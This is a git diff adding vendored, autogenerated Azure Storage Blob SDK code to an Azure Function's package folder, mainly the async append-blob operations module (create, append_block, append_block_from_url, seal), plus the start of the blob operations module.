a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..b6f98ea Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..146a0a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..4261e5e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc new file mode 100644 index 0000000..3af028d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..9589053 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc new file mode 100644 index 0000000..fcaa484 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py new file mode 100644 index 0000000..b9da858 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py @@ -0,0 +1,677 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._append_blob_operations import build_append_block_from_url_request, build_append_block_request, build_create_request, build_seal_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class AppendBlobOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`append_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create Append Blob operation creates a new append blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "AppendBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + timeout=timeout, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def append_block( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Append Block operation commits a new block of data to the end of an existing append blob. + The Append Block operation is permitted only if the blob was created with x-ms-blob-type set to + AppendBlob. Append Block is supported only on version 2015-02-21 version or later. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _max_size = None + _append_position = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_append_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.append_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def append_block_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url: str, + content_length: int, + source_range: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Append Block operation commits a new block of data to the end of an existing append blob + where the contents are read from a source url. The Append Block operation is permitted only if + the blob was created with x-ms-blob-type set to AppendBlob. Append Block is supported only on + version 2015-02-21 version or later. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param content_length: The length of the request. + :type content_length: long + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _max_size = None + _append_position = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_append_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + source_url=source_url, + content_length=content_length, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.append_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def seal( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Seal operation seals the Append Blob to make it read-only. Seal is supported only on + version 2019-12-12 version or later. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :keyword comp: comp. Default value is "seal". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "seal") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _append_position = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + if append_position_access_conditions is not None: + _append_position = append_position_access_conditions.append_position + + request = build_seal_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + append_position=_append_position, + template_url=self.seal.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + seal.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py new file mode 100644 index 0000000..5ee65f2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py @@ -0,0 +1,2905 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._blob_operations import build_abort_copy_from_url_request, build_acquire_lease_request, build_break_lease_request, build_change_lease_request, build_copy_from_url_request, build_create_snapshot_request, build_delete_immutability_policy_request, build_delete_request, build_download_request, build_get_account_info_request, build_get_properties_request, build_get_tags_request, build_query_request, build_release_lease_request, build_renew_lease_request, build_set_expiry_request, build_set_http_headers_request, build_set_immutability_policy_request, build_set_legal_hold_request, build_set_metadata_request, build_set_tags_request, build_set_tier_request, build_start_copy_from_url_request, build_undelete_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class BlobOperations: # pylint: disable=too-many-public-methods + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`blob` attribute. + """ + + models = _models + 